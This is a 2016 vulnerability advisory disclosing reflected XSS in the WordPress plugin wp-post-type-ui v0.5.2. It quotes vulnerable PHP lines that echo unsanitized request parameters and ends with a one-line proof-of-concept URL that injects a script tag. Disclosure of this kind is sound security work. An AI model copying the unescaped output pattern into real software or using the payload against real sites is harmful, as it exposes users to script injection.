Advisory #: 472
Title: Reflected XSS in wordpress plugin wp-post-type-ui v0.5.2
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/wp-post-type-ui
Downloads: 5863
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: wp-post-type-ui
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./wp-post-type-ui/wp-post-type-ui.php: 277: <input type="hidden" value="<?php echo $_GET['page']; ?>" name="page"> 280: <input type="text" value="<?php echo $_GET['s']; ?>" name="s" id="tag-search-input"> 294: <?php if(isset($_GET['action'])) : ?><input type="button" value="Add New Post Type" onclick="location.href='?page=<?php echo $_GET['page']; ?>'" class="button"><?php endif; ?> 295: <?php if(isset($_GET['s'])) : ?><input type="button" value="Cancel Post Type Search" onclick="location.href='?page=<?php echo $_GET['page']; ?>'" class="button"><?php endif; ?> 340: <td class="name column-name"><strong><a title="Edit <?php echo $post_type['labels']['name']; ?>" href="?page=<?php echo $_GET['page'] ?>&amp;action=edit_post_type&amp;i=<?php echo $index; ?>" class="row-title"><?php echo $post_type['labels']['name']; ?></a></strong><br><div class="row-actions"><span class="edit"><a href="?page=<?php echo $_GET['page'] ?>&amp;action=edit_post_type&amp;i=<?php echo $index; ?>">Edit</a> | </span><span class="trash"><a class="submitdelete" href="?page=<?php echo $_GET['page'] ?>&amp;action=delete_post_type&amp;i=<?php echo $index; ?>">Delete</a></span></div></td> 642: <input type="hidden" value="<?php echo $_GET['page']; ?>" name="page"> 645: <input type="text" value="<?php echo $_GET['s']; ?>" name="s" id="tag-search-input"> 656: <?php if(isset($_GET['action'])) : ?><input type="button" value="Add New Taxonomy" onclick="location.href='?page=<?php echo $_GET['page']; ?>'" class="button"><?php endif; ?> 657: <?php if(isset($_GET['s'])) : ?><input type="button" value="Cancel Taxonomy Search" onclick="location.href='?page=<?php echo $_GET['page']; ?>'" class="button"><?php endif; ?> 699: <td class="name column-name"><strong><a href="#" class="row-title"><?php echo $taxonomy['args']['labels']['name']; ?></a></strong><br><div class="row-actions"><span class="edit"><a href="?page=<?php echo $_GET['page'] ?>&amp;action=edit_taxonomy&amp;i=<?php echo $index; ?>">Edit</a> | </span><span class="trash"><a class="submitdelete" href="?page=<?php echo $_GET['page'] ?>&amp;action=delete_taxonomy&amp;i=<?php echo $index; ?>">Delete</a></span></div></td> The variable page and s appear to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./wp-post-type-ui/wp-post-type-ui.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/wp-post-type-ui/wp-post-type-ui.php?page="><script>alert(1);</script><"